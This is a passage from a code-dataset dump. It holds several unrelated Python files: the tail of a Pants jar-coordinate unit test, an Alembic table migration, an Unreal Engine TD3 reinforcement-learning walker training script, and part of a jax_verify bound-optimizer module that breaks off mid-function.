test_resolved_jars_with_same_properties(self):\n jar1 = ResolvedJar(M2Coordinate('org.example', 'lib'), 'path')\n jar2 = 
ResolvedJar(M2Coordinate('org.example', 'lib'), 'path')\n\n self.assertEqual(jar1, jar2)\n self.assertEqual(hash(jar1), hash(jar2))\n\n def test_resolved_jars_with_differing_cache_paths_not_equal(self):\n jar1 = ResolvedJar(M2Coordinate('org.example', 'lib'), 'path1')\n jar2 = ResolvedJar(M2Coordinate('org.example', 'lib'), 'path2')\n\n self.assertNotEqual(jar1, jar2)\n\n def test_resolved_jars_with_differing_paths_not_equal(self):\n jar1 = ResolvedJar(M2Coordinate('org.example', 'lib'), 'ivy2/path', 'path1')\n jar2 = ResolvedJar(M2Coordinate('org.example', 'lib'), 'ivy2/path', 'path2')\n\n self.assertNotEqual(jar1, jar2)\n\n def test_resolved_jars_with_same_paths_equal(self):\n jar1 = ResolvedJar(M2Coordinate('org.example', 'lib'), 'ivy2/path', 'path')\n jar2 = ResolvedJar(M2Coordinate('org.example', 'lib'), 'ivy2/path', 'path')\n\n self.assertEqual(jar1, jar2)\n\n def test_m2_coordinate_create_noop(self):\n m2 = M2Coordinate(org='a', name='b', rev='c', classifier='d', ext='e')\n m2_new = M2Coordinate.create(m2) # Should just return the original object.\n self.assertIs(m2, m2_new)\n\n def test_m2_coordinate_create(self):\n attrs = ('org', 'name', 'rev', 'classifier', 'ext')\n\n class CoordinateLike(object):\n def __init__(self):\n for i, a in enumerate(attrs):\n setattr(self, a, chr(i+ord('a'))) # Set attrs to the first few letters in the alphabet.\n\n coord = CoordinateLike()\n m2 = M2Coordinate.create(coord)\n self.assertNotEqual(m2, coord)\n self.assertEquals(tuple(getattr(coord, a) for a in attrs),\n tuple(getattr(m2, a) for a in attrs))\n\n def test_m2_coordinate_unversioned_noop(self):\n m2 = M2Coordinate(org='a', name='b', rev=None, classifier='d', ext='e')\n m2_un = M2Coordinate.unversioned(m2) # Should just return the original object.\n self.assertIs(m2, m2_un)\n\n def test_m2_coordinate_unversioned(self):\n m2 = M2Coordinate(org='a', name='b', rev='c', classifier='d', ext='e')\n m2_un = M2Coordinate.unversioned(m2)\n self.assertNotEquals(m2, m2_un)\n self.assertTrue(m2_un.rev is None)\n","sub_path":"tests/python/pants_test/backend/jvm/test_jar_dependency_utils.py","file_name":"test_jar_dependency_utils.py","file_ext":"py","file_size_in_byte":5865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"19675780","text":"\"\"\"Added Pipeline Archive model\n\nRevision ID: c789ecdb563c\nRevises: 5e23f85605a5\nCreate Date: 2016-09-14 13:38:06.578309\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'c789ecdb563c'\ndown_revision = '5e23f85605a5'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('pipeline_archive',\n sa.Column('pipeline_id', sa.Integer(), nullable=False),\n sa.Column('task_id', sa.Integer(), nullable=False),\n sa.Column('creation_time', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['pipeline_id'], ['pipelines.id'], ),\n sa.ForeignKeyConstraint(['task_id'], ['tasks.id'], ),\n sa.PrimaryKeyConstraint('pipeline_id', 'task_id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('pipeline_archive')\n ### end Alembic commands ###","sub_path":"alembic/versions/c789ecdb563c_added_pipeline_archive_model.py","file_name":"c789ecdb563c_added_pipeline_archive_model.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"32928053","text":"import unreal_engine as ue\n\nimport math\nimport random\nimport torch\nimport gym\nimport numpy as np\nfrom TD3 import TD3\nfrom utils import ReplayBuffer\nimport time\nimport os\nimport copy\nfrom pathlib import Path\nimport threading\n\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom unreal_engine import FVector, FRotator, FTransform, FHitResult, FLinearColor\nfrom unreal_engine.classes import ActorComponent, ForceFeedbackEffect, KismetSystemLibrary, WidgetBlueprintLibrary\nfrom unreal_engine.enums import EInputEvent, ETraceTypeQuery, EDrawDebugTrace\n\n\n# joint_obs_num = 18\n# state_dim = joint_obs_num\n# state_dim += 2 #pitch/roll\n# state_dim += 1 #ground dist\n# state_dim += 7*6 #ang/lin vel\n# state_dim += 7*6 #pos/rot\n# state_dim += 8 # ground sensors\n# state_dim += 2 # contact sensors\n# state_dim += 1 # target angle - calculated in PY\n#\n#\n# action_dim = 14\n\n#state_dim += action_dim\n\nmax_action = 1.0\n\nmax_power = 60000\ntrace_length = 100 * 40\n\nlog_interval = 60 # print avg reward after interval\ngamma = 0.99 # discount for future rewards\nbatch_size = 128 # num of transitions sampled from replay buffer\nlr = 0.00001\nexploration_noise = 0.4\npolyak = 0.995 # target policy update parameter (1-tau)\npolicy_noise = 0.2 # target policy smoothing noise\nnoise_clip = 0.5\npolicy_delay = 2 # delayed policy updates parameter\nmax_timesteps = 1000 # max timesteps in one episode\n\ndirectory = \"./NNModels/SkelWalker3d\" # save trained models\n#filename = \"TD3_BLIND\"\nloadpol = False\nloadfilename = \"TD3_Skel3dX4\"\nfilename = \"TD3_Skel3dX4\"\n#TD3_BipedalWalker3dComplex2 angdamp = 600\n#TD3_BipedalWalker3dComplex2a angdamp = 100\n#TD3_BipedalWalker3dComplex2b angdamp = 20\n\n\nPath(directory).mkdir(parents=True, exist_ok=True)\n\nprint(os.path.abspath(directory))\n\n\nmaster = None\n\nclass TorchWalkerMaster:\n\n # this is called on game start\n def begin_play(self):\n global master\n self.has_init = False\n master = self\n self.replay_buffer = ReplayBuffer(max_size=200000)\n ue.log('Begin Play on TorchWalkerMaster class')\n ue.log(\"Has CUDA: {}\".format(torch.cuda.is_available()))\n\n\n self.frame = 0\n\n\n self.episode = 0\n self.worker_id = 0\n\n self.writer = SummaryWriter(os.path.join(directory, filename))\n self.can_thread = True\n\n def init_network(self, state_dim, action_dim):\n if not self.has_init:\n print(\"--INITNET---\")\n self.has_init = True\n self.state_dim = state_dim\n self.action_dim = action_dim\n self.policy = TD3(lr, state_dim, action_dim, max_action)\n print(state_dim)\n print(action_dim)\n print(\"--INITNET---\")\n\n if loadpol:\n self.policy.load(directory, loadfilename)\n\n def get_next_ep(self):\n self.episode += 1\n return self.episode\n def get_id(self):\n retid = self.worker_id\n self.worker_id += 1\n return retid\n def write_data(self,ep_reward, ep_reward_avg, ep_frame):\n real_ep = self.episode\n self.writer.add_scalar('ep_reward',\n ep_reward,\n real_ep)\n self.writer.add_scalar('ep_avg_reward',\n ep_reward_avg,\n real_ep)\n self.writer.add_scalar('ep_frame',\n ep_frame,\n real_ep)\n #print(\"finished ep {}, avgscore: {}\".format(real_ep, ep_reward_avg))\n 
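# The scalars above are logged at the pre-increment episode index; the shared counter is advanced next so successive minion episodes land on distinct TensorBoard steps.\n 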
self.episode += 1\n def transfer_buffer(self, buffer):\n self.replay_buffer.mergein(buffer)\n #print(\"buffer merged, length: {}\".format(self.replay_buffer.size))\n\n def thread_func(self):\n if self.replay_buffer.size:\n al, c1l, c2l, prl = self.policy.update(self.replay_buffer, 200, batch_size, gamma, polyak, policy_noise,\n noise_clip, policy_delay)\n print(\"aloss:{}, frame:{}, mem:{}\".format(al, self.frame, self.replay_buffer.size))\n self.writer.add_scalar('actor_loss',\n al,\n self.frame)\n self.writer.add_scalar('c1_loss',\n c1l,\n self.frame)\n self.writer.add_scalar('c2_loss',\n c2l,\n self.frame)\n\n else:\n print(\"skipping\")\n time.sleep(0.01)\n self.can_thread = True\n\n def thread_func_crit(self):\n if self.replay_buffer.size:\n al, c1l, c2l, prl = self.policy.update(self.replay_buffer, 200, batch_size, gamma, polyak, policy_noise,\n noise_clip, policy_delay)\n print(\"aloss:{}, frame:{}, mem:{}\".format(al, self.frame, self.replay_buffer.size))\n self.writer.add_scalar('actor_loss',\n al,\n self.frame)\n self.writer.add_scalar('c1_loss',\n c1l,\n self.frame)\n self.writer.add_scalar('c2_loss',\n c2l,\n self.frame)\n\n else:\n print(\"skipping\")\n time.sleep(0.01)\n self.can_thread = True\n\n def tick(self, delta_time):\n self.frame += 1\n\n if self.replay_buffer.size < 10000:\n # if self.can_thread:\n # x = threading.Thread(target=self.thread_func_crit)#, args=(1,))\n # x.start()\n # self.can_thread = False\n # print(\"buffer size: {}\".format(self.replay_buffer.size))\n return\n\n if self.can_thread:\n x = threading.Thread(target=self.thread_func)#, args=(1,))\n x.start()\n self.can_thread = False\n\n if self.frame % 600 == 0:\n self.policy.save(directory, filename)\n\nclass TorchWalkerMinion:\n\n # this is called on game start\n def begin_play(self):\n self.actor = self.uobject.get_owner()\n self.replay_buffer = ReplayBuffer(max_size=50000)\n ue.log('Begin Play on TorchWalkerMinion class')\n\n #self.policy = TD3(lr, state_dim, action_dim, max_action)\n self.gen_target()\n\n self.last_state = []\n self.last_reward = 0\n self.last_action = None\n self.last_done = False\n self.frame = int(random.random() * 100)\n self.start_pos = self.uobject.get_actor_location()\n\n\n self.episode = 0\n\n self.ep_frame = 0\n self.ep_reward = 0\n self.total_frame = 0\n\n\n self.boredom = 0.8\n\n print(\"MASTER\")\n print(master)\n\n actionlen = self.actor.get_action_dim()\n TEMP_OBS = self.actor.update_observation()[0]\n print(\"TEMP_OBS\")\n print(TEMP_OBS)\n obslen = len(TEMP_OBS)\n print(obslen)\n master.init_network(obslen+1, actionlen)\n\n self.my_id = master.get_id()\n #self.actor.TextRender.call('SetText {}'.format(self.my_id))\n\n self.random_frames = 10\n\n self.bg_thread = None\n\n self.exploration_noise = random.random()*0.3\n self.first_frame = True\n\n\n\n self.policy = master.policy\n\n self.action_space_low = [-1 for x in range(master.action_dim)]\n self.action_space_high = [1 for x in range(master.action_dim)]\n\n\n self.obs_space_low = [-1 for x in range(master.state_dim)]\n self.obs_space_high = [1 for x in range(master.state_dim)]\n\n def gen_target(self):\n target_angle = math.pi*.5# random.random() * math.pi * 2.0\n target_dist = 1000+random.random() * 100 * 1500\n self.target_x = math.cos(target_angle) * target_dist\n self.target_y = math.sin(target_angle) * target_dist\n self.last_dist = self.get_target_dist()\n\n def get_target_angle(self):\n location = self.actor.get_actor_location()\n angle = self.actor.GetTargetAngleFromPos(FVector(self.target_x, self.target_y, 
location.z))[0]\n nangle = angle / 360 + .5\n return nangle\n\n def get_angle_rads(self):\n angle = self.actor.get_actor_rotation().yaw\n rangle = angle / 180 * math.pi\n return rangle\n\n def get_target_dist(self):\n location = self.actor.get_actor_location()\n xd = location.x - self.target_x\n yd = location.y - self.target_y\n #perhaps check furthest component instead?\n #foreach component:\n #get biggest dstsqr\n #return sqrt(biggest)\n return math.sqrt(xd * xd + yd * yd)\n\n def reset_ep(self):\n #print(\"reset\")\n self.boredom = 0.8\n self.ep_frame = 0\n self.ep_reward = 0\n self.episode += 1\n self.actor.reset_dude()\n #self.actor.ResetPos()\n self.gen_target()\n self.random_frames = random.randint(3,9)\n self.first_frame = True\n\n def tick(self, delta_time):\n self.ep_frame+=1\n self.total_frame += 1\n\n #############get observation#############\n obs = self.actor.update_observation()[0]\n\n target_angle = self.get_target_angle()\n obs.append(target_angle)\n\n state = np.array(obs)\n state = state.clip(self.obs_space_low, self.obs_space_high)\n\n #############get action from policy###############\n if self.total_frame > 0:\n if self.ep_frame < self.random_frames:\n action = np.random.normal(0, exploration_noise*5, size=master.action_dim)\n else:\n action = self.policy.select_action(state)\n action = action + np.random.normal(0, self.exploration_noise, size=master.action_dim)\n action = action.clip(self.action_space_low, self.action_space_high)\n else:\n action = np.random.normal(0, self.exploration_noise*.2, size=master.action_dim)\n\n\n ###############apply action################\n self.actor.set_action(action.tolist())\n\n ########## calc reward ###########\n reward = self.actor.calc_reward()\n\n #reward for keeping joints closer to neutral\n rv = 0\n for jo in self.actor.joint_obs:\n rv += abs(jo-0.5)-.1\n #print(-rv)\n rv *= .01\n reward -= rv\n\n reward -= abs(target_angle)-0.7\n\n\n #getting closer to target\n new_dist = self.get_target_dist()\n diffd = self.last_dist - new_dist\n reward += diffd*.5\n\n self.uobject.draw_debug_line(self.actor.get_actor_location(),\n FVector(self.target_x, self.target_y, self.actor.get_actor_location().z),\n FLinearColor(0, 1, 0),\n 0, 3)\n\n self.last_dist = new_dist\n\n #staying away from ground\n reward += self.actor.ground_dist-.2\n reward += self.actor.head_ground_dist-.2\n\n if random.random()>.9:\n self.actor.action_eval = self.policy.eval_action(state, action)\n\n #timeout, new EP\n done = 0\n if self.ep_frame > max_timesteps:\n done = 1\n\n if self.actor.ground_dist < .045:\n self.actor.hit_body = False\n done = 1\n reward -= 30\n if self.actor.head_ground_dist < .085:\n self.actor.hit_body = False\n done = 1\n reward -= 30\n\n\n # if 1:#self.actor.get_display_name() == \"BipedalWalker3d\":\n # print(\" --- \")\n # print(\" --- \")\n # print(self.replay_buffer.size)\n # print(\" --- \")\n # print(\"joints\")\n # print(-rv)\n # print(\"feet touching\")\n # print(2-self.actor.rfoot_touch-self.actor.lfoot_touch)\n # print(\"ground dist\")\n # print(self.actor.ground_dist-.3)\n # # print(\"balance\")\n # # print((self.actor.body.get_up_vector().z-.4)*.5)\n # print(\"total\")\n # print(reward)\n\n self.ep_reward += reward\n\n self.actor.last_reward = reward\n\n ####### record action ############\n if self.ep_frame > self.random_frames-1:\n self.replay_buffer.add((self.last_state, self.last_action, reward, state, float(done)))\n self.last_state = state\n self.last_action = action\n\n if done:\n ep_reward_avg = 
self.ep_reward/self.ep_frame\n master.write_data(self.ep_reward, ep_reward_avg, self.ep_frame)\n self.reset_ep()\n master.transfer_buffer(self.replay_buffer)\n self.replay_buffer = ReplayBuffer()\n\n # if new_dist < 500:\n # self.gen_target()\n # self.last_dist = self.get_target_dist()\n # #ue.log(\"NEW TARGET!!!!!\")\n\n self.frame += 1\n self.actor.rfoot_touch = 0\n self.actor.lfoot_touch = 0\n #if self.my_id == 1:\n #print(state)\n\n","sub_path":"Content/Scripts/SwarmSkeleton.py","file_name":"SwarmSkeleton.py","file_ext":"py","file_size_in_byte":12993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"558495128","text":"# coding=utf-8\n# Copyright 2021 The jax_verify Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Provides optimizers to use with the NonConvexBound in `nonconvex.py`.\n\"\"\"\n\nimport abc\nimport math\nfrom typing import Tuple, Callable, Dict, Optional, List\n\nimport jax\nimport jax.numpy as jnp\n\nfrom jax_verify.src import bound_propagation\nfrom jax_verify.src import ibp\nfrom jax_verify.src import utils\nfrom jax_verify.src.nonconvex import nonconvex\nimport numpy as np\nimport optax\n\n\nTensor = jnp.ndarray\nIndex = bound_propagation.Index\nParamSet = nonconvex.ParamSet\nBranchPlane = Tuple[Index, int, float]\nBranchConstraint = Tuple[BranchPlane, int]\n\n\nclass BoundOptimizer(metaclass=abc.ABCMeta):\n \"\"\"Abstract Class to define the API of optimizer.\n\n Each subclass defines an optimization algorithm to solve the optimization\n problem defined by a NonConvexBound. 
This is done by overloading the\n `optimize` function.\n \"\"\"\n\n @abc.abstractmethod\n def optimize_fun(self, non_convex_bound: nonconvex.NonConvexBound\n ) -> Callable[[ParamSet, ParamSet], ParamSet]:\n pass\n\n\nclass OptimizingConcretizer(nonconvex.Concretizer):\n \"\"\"Concretizer based on optimizing the intermediate bounds.\n\n This needs to be initialized with an optimizer, and concrete bounds will be\n obtained by solving the relaxation for the intermediate activations.\n \"\"\"\n\n def __init__(\n self, optimizer: BoundOptimizer,\n max_parallel_nodes: int = 512,\n branching_constraints: Optional[List[BranchConstraint]] = None,\n branching_optimizer: Optional[optax.GradientTransformation] = None,\n branching_opt_number_steps: int = 0):\n self._optimizer = optimizer\n self._max_parallel_nodes = max_parallel_nodes\n self._branching_constraints = []\n self._branching_optimizer = None\n self._branching_opt_number_steps = branching_opt_number_steps\n\n if branching_constraints is not None:\n self._branching_constraints = branching_constraints\n # Keep the optimizer for the branching constraints dual variables.\n if (branching_optimizer is None) or (branching_opt_number_steps == 0):\n raise ValueError('If branching constraints are imposed, an optimizer '\n 'and a number of optimization steps for the lagrangian'\n ' variables corresponding to them needs to be '\n 'provided.')\n self._branching_optimizer = branching_optimizer\n self._branching_opt_number_steps = branching_opt_number_steps\n\n def accept_input(self, *_args, **_kwargs):\n # There is no need to update anything.\n pass\n\n def accept_primitive(self, *_args, **_kwargs):\n # For now, the optimizer is not dependent on what propagation has been\n # achieved, so just reuse the same.\n # Potentially, in the future, we could handle adapting the hyperparameters.\n pass\n\n def get_bounds(self, to_opt_bound: nonconvex.NonConvexBound\n ) -> bound_propagation.Bound:\n optimize_fun = self._optimizer.optimize_fun(to_opt_bound)\n\n def optimize_chunk(chunk_index: int) -> Tuple[Tensor, Tensor]:\n var_shapes, chunk_objectives = _create_opt_problems(\n to_opt_bound, chunk_index, self._max_parallel_nodes)\n\n ini_var_set = {key: 0.5 * jnp.ones(shape)\n for key, shape in var_shapes.items()}\n\n def solve_problem(objectives: ParamSet) -> Tensor:\n # Optimize the bound for primal variables.\n opt_var_set = optimize_fun(objectives, ini_var_set)\n # Compute the resulting bound\n _, bound_vals = to_opt_bound.dual(jax.lax.stop_gradient(opt_var_set),\n objectives)\n return bound_vals\n\n if any(node_idx <= to_opt_bound.index\n for ((node_idx, *_), _) in self._branching_constraints):\n # There exists constraints that needs to be taken into account.\n\n # The dual vars per constraint are scalars, but we need to apply them\n # for each of the optimization objective.\n nb_targets = chunk_objectives[to_opt_bound.index].shape[0]\n # Create the dual variables for them.\n active_branching_constraints = [\n (node_idx, neuron_idx, val, side)\n for (node_idx, neuron_idx, val), side in self._branching_constraints\n if node_idx <= to_opt_bound.index\n ]\n nb_constraints = len(active_branching_constraints)\n dual_vars = [jnp.zeros([nb_targets])] * nb_constraints\n\n # Define the objective function to optimize. 
The branching constraints\n # are lifted into the objective function.\n def unbranched_objective(dual_vars: ParamSet) -> Tuple[float, Tensor]:\n objectives = chunk_objectives.copy()\n base_term = jnp.zeros([nb_targets])\n for ((node_idx, neuron_idx, val, side),\n branch_dvar) in zip(active_branching_constraints, dual_vars):\n # Adjust the objective function to incorporate the dual variables.\n if node_idx not in objectives:\n objectives[node_idx] = jnp.zeros(var_shapes[node_idx])\n\n # The branching constraint is encoded as:\n # side * neuron >= side * val\n # (when side==1, this is neuron >= lb,\n # and when side==-1, this is -neuron >= -ub )\n # To put in a canonical form \\lambda_b() <= 0, this is:\n # \\lambda_b() = side * val - side * neuron\n\n # Lifting the branching constraints takes us from the problem:\n # min_{z} f(z)\n # s.t. \\mu_i() <= z_i <= \\eta_i() \\forall i\n # \\lambda_b() <= 0 \\forall b\n #\n # to\n # max_{\\rho_b} min_{z} f(z) + \\rho_b \\lambda_b()\n # s.t \\mu_i() <= z_i <= \\eta_i() \\forall i\n # s.t rho_b >= 0\n\n # Add the term corresponding to the dual variables to the linear\n # objective function.\n coeff_to_add = -side * branch_dvar\n index_to_update = jax.ops.index[:, neuron_idx]\n flat_node_obj = jnp.reshape(objectives[node_idx], (nb_targets, -1))\n flat_updated_node_obj = jax.ops.index_add(flat_node_obj,\n index_to_update,\n coeff_to_add)\n updated_node_obj = jnp.reshape(flat_updated_node_obj,\n var_shapes[node_idx])\n objectives[node_idx] = updated_node_obj\n\n # Don't forget the terms based on the bound.\n base_term = base_term + (side * val * branch_dvar)\n\n network_term = solve_problem(objectives)\n bound = network_term + base_term\n\n return bound.sum(), bound\n\n def evaluate_bound(ini_dual_vars: List[Tensor]) -> Tensor:\n ini_state = self._branching_optimizer.init(ini_dual_vars)\n eval_and_grad_fun = jax.grad(unbranched_objective, argnums=0,\n has_aux=True)\n\n # The carry consists of:\n # - The best set of dual variables seen so far.\n # - The current set of dual variables.\n # - The best bound obtained so far.\n # - The state of the optimizer.\n # For each of the step, we will:\n # - Evaluate the bounds by the current set of dual variables.\n # - Update the best set of dual variables if progress was achieved.\n # - Do an optimization step on the current set of dual variables.\n # This way, we are guaranteed that we keep track of the dual variables\n # producing the best bound at the end.\n def opt_step(\n carry: Tuple[List[Tensor], List[Tensor],\n Tensor, optax.OptState], _\n ) -> Tuple[Tuple[List[Tensor], List[Tensor],\n Tensor, optax.OptState], None]:\n best_lagdual, lagdual, best_bound, state = carry\n # Compute the bound and their gradients.\n lagdual_grads, new_bound = eval_and_grad_fun(lagdual)\n\n # Update the lagrangian dual variables for the best bound seen.\n improve_best = new_bound > best_bound\n new_best_lagdual = []\n for best_dvar, new_dvar in zip(best_lagdual, lagdual):\n new_best_lagdual.append(jnp.where(improve_best,\n new_dvar, best_dvar))\n # Update the best bound seen\n new_best_bound = jnp.maximum(best_bound, new_bound)\n\n # Perform optimization step\n updates, new_state = self._branching_optimizer.update(\n lagdual_grads, state, lagdual)\n unc_dual = optax.apply_updates(lagdual, updates)\n new_lagdual = jax.tree_map(lambda x: jnp.maximum(x, 0.), unc_dual)\n return ((new_best_lagdual, new_lagdual, new_best_bound, new_state),\n None)\n\n dummy_bound = -float('inf')*jnp.ones([nb_targets])\n initial_carry = (ini_dual_vars, 
ini_dual_vars, dummy_bound, ini_state)\n\n (best_lagdual, *_), _ = jax.lax.scan(\n opt_step, initial_carry, None,\n length=self._branching_opt_number_steps)\n\n _, bound_vals = unbranched_objective(\n jax.lax.stop_gradient(best_lagdual))\n\n return bound_vals\n\n bound_vals = evaluate_bound(dual_vars)\n else:\n bound_vals = solve_problem(chunk_objectives)\n\n chunk_lbs, chunk_ubs = _unpack_opt_problem(bound_vals)\n return chunk_lbs, chunk_ubs\n\n return _chunked_optimization(to_opt_bound.shape,\n self._max_parallel_nodes,\n optimize_chunk)\n\n\ndef _chunked_optimization(\n bound_shape: Tuple[int, ...],\n max_parallel_nodes: int,\n optimize_chunk: Callable[[int], Tuple[Tensor, Tensor]],\n) -> ibp.IntervalBound:\n \"\"\"Perform optimization of the target in chunks.\n\n Args:\n bound_shape: Shape of the bound to compute\n max_parallel_nodes: How many activations to optimize at once. If =0, perform\n optimize all the nodes simultaneously.\n optimize_chunk: Function to optimize a chunk and return updated bounds.\n Returns:\n bounds: Optimized bounds.\n \"\"\"\n nb_opt = int(np.prod(bound_shape))\n if (max_parallel_nodes == 0) or (nb_opt <= max_parallel_nodes):\n flat_lbs, flat_ubs = optimize_chunk(0)\n else:\n nb_opt_chunk = math.ceil(nb_opt / max_parallel_nodes)\n chunk_indices = jnp.arange(nb_opt_chunk)\n (map_lbs, map_ubs) = jax.lax.map(optimize_chunk, chunk_indices)\n # Remove the padding elements\n flat_lbs = jnp.reshape(map_lbs, (-1,))[:nb_opt]\n flat_ubs = jnp.reshape(map_ubs, (-1,))[:nb_opt]\n lbs = jnp.reshape(flat_lbs, bound_shape)\n ubs = jnp.reshape(flat_ubs, bound_shape)\n bounds = ibp.IntervalBound(lbs, ubs)\n return bounds\n\n\ndef _create_opt_problems(\n non_convex_bound: nonconvex.NonConvexBound,\n chunk_index: int,\n nb_parallel_nodes: int,\n) -> Tuple[Dict[Index, Tuple[int, ...]], ParamSet]:\n \"\"\"Define the objective function and the necessary variables shape.\n\n Iteratively yields the objectives to minimize in order to limit memory usage.\n\n Args:\n non_convex_bound: Bound for which to create the optimization problems.\n chunk_index: Index of the optimization chunk to generate.\n nb_parallel_nodes: How large should the optimization chunks be. 
If 0,\n optimize all problems at once.\n Returns:\n var_to_opt: shapes of the variables to optimize to compute the bounds.\n objectives_by_layer: Objectives to minimize, in the form of a dictionary\n mapping the position of activations to the linear coefficients of the\n objective function.\n \"\"\"\n # Create the objective matrix\n lb_obj = utils.objective_chunk(\n non_convex_bound.shape, chunk_index, nb_parallel_nodes)\n # Get the objective for the upper bounds.\n ub_obj = -lb_obj\n obj = jnp.concatenate([lb_obj, ub_obj], axis=0)\n\n # Generate the shape of the variables necessary to solve the problem\n var_to_opt = {}\n for pos, var_shape in non_convex_bound.variables.items():\n var_to_opt[pos] = (obj.shape[0],) + var_shape\n\n objectives_by_layer = {non_convex_bound.index: obj}\n return var_to_opt, objectives_by_layer\n\n\ndef _unpack_opt_problem(dual_vals: Tensor) -> Tuple[Tensor, Tensor]:\n \"\"\"Extract the lower bounds and upper bounds from the result of optmization.\n\n Args:\n dual_vals: Value of the dual returned by the optimization process.\n Returns:\n lb: Tensor containing lower bounds were they were computed and 0 elsewhere.\n ub: Tensor containing upper bounds were they were computed and 0 elsewhere.\n \"\"\"\n lb_duals, ub_duals = jnp.split(dual_vals, 2, axis=0)\n\n return lb_duals, -ub_duals\n\n\ndef _pgd_step(current: ParamSet,\n grad: ParamSet,\n step_size: Tensor) -> ParamSet:\n \"\"\"Do a projected gradient step with the given step size.\"\"\"\n new_varset = {}\n for key, var in current.items():\n var_grad = grad[key]\n nb_act_dims = len(var.shape) - len(step_size.shape)\n broad_step_size = jnp.reshape(step_size,\n step_size.shape + (1,)*nb_act_dims)\n new_varset[key] = jnp.clip(var + broad_step_size * var_grad, 0., 1.)\n return new_varset\n\n\nclass LinesearchFistaOptimizer(BoundOptimizer):\n \"\"\"FISTA with line search.\n\n As done in the \"An efficient nonconvex reformulation of stagewise convex\n optimization problems\" NeurIPS2020 submission. This is a reimplementation\n of the code at:\n l/d/r/r_v/verification/ibp/verification/nonconvex_optimizable_bounds.py\n\n The difference between the two versions of the code is that this\n implementation performs minimization while the other one performed\n maximization. 
This difference is visible in the following places:\n - Changes the formula of the quadratic approximation (sign before\n the L2 norm term).\n - Direction of the comparison for the line search.\n - Direction of the step.\n - Direction of the dual gap (when minimizing, it is primal - dual, while\n it is dual - primal when maximizing) to check for convergence.\n \"\"\"\n\n def __init__(self,\n num_steps: int,\n max_step_size: float = 100.0,\n min_step_size: float = 1e-5,\n beta_l: float = 0.5,\n beta_h: float = 1.5,\n check_convergence_every: int = 1,\n check_relative_dual_gap: bool = False,\n termination_dual_gap: float = 1e-2):\n self._num_steps = num_steps\n self._max_step_size = max_step_size\n self._min_step_size = min_step_size\n self._beta_l = beta_l\n self._beta_h = beta_h\n self._check_convergence_every = check_convergence_every\n self._check_relative_dual_gap = check_relative_dual_gap\n self._termination_dual_gap = termination_dual_gap\n\n def optimize_fun(self, non_convex_bound: nonconvex.NonConvexBound\n )->Callable[[ParamSet, ParamSet], ParamSet]:\n \"\"\"Returns a function optimizing the primal variables.\n\n Args:\n non_convex_bound: NonConvex object to define the objective function over\n Returns:\n optimize: Optimization function.\n \"\"\"\n ## Define the functions for the backtracking line search\n # We have a separate optimization per optimization target (so one per batch\n # element times per neuron).\n # This will be performed in jax.lax.while_loop, with the following arguments\n # ls_loop_args:\n # need_lower: Boolean array indicating for each step_size if we still\n # needs to lower the step size.\n # step_size: Array of step size being used.\n # y_stats: Tuple with y, f(y) and grad(y), so that we don't have to keep\n # recomputing it.\n # objectives: Coefficients of the objective functions.\n def quad_approx(x: ParamSet,\n y: ParamSet,\n grad_y: ParamSet,\n step_size: Tensor) -> Tensor:\n quad_approx = 0\n for key, x_var in x.items():\n y_var = y[key]\n grady_var = grad_y[key]\n dims_to_reduce = tuple(range(1, y_var.ndim))\n quad_approx = quad_approx + (\n ((x_var - y_var)*grady_var).sum(axis=dims_to_reduce)\n + 0.5 / step_size * ((x_var - y_var)**2).sum(axis=dims_to_reduce))\n return quad_approx\n\n def should_decrease(step_size: Tensor,\n y_stats: Tuple[ParamSet, Tensor, ParamSet],\n objectives: ParamSet) -> Tensor:\n y, f_y, grad_y = y_stats\n new_x = _pgd_step(y, grad_y, -step_size)\n val_newx, _ = non_convex_bound.primal_fn(new_x, objectives)\n val_qapprox = f_y + quad_approx(new_x, y, grad_y, step_size)\n per_sp_insufficient_progress = (val_newx >= val_qapprox)\n step_size_not_min = step_size > self._min_step_size\n return jnp.logical_and(step_size_not_min, per_sp_insufficient_progress)\n\n def lower_stepsize_if_needed(\n ls_loop_args:\n Tuple[Tensor, Tensor, Tuple[ParamSet, Tensor, ParamSet], ParamSet],\n ) -> Tuple[Tensor, Tensor, Tuple[ParamSet, Tensor, ParamSet], ParamSet]:\n \"\"\"Reduce the step size for all the optimization target that need it.\n\n Update the check to see if it needs to be reduced further.\n\n Args:\n ls_loop_args: Line search loop arguments\n Returns:\n new_ls_loop_args: Updated line search loop arguments\n \"\"\"\n need_lower, step_size, y_stats, objectives = ls_loop_args\n new_step_size = jnp.where(need_lower,\n self._beta_l * step_size, step_size)\n new_need_lower = should_decrease(new_step_size, y_stats, objectives)\n return (new_need_lower, new_step_size, y_stats, objectives)\n\n any_need_lower_stepsize = lambda ls_loop_args: 
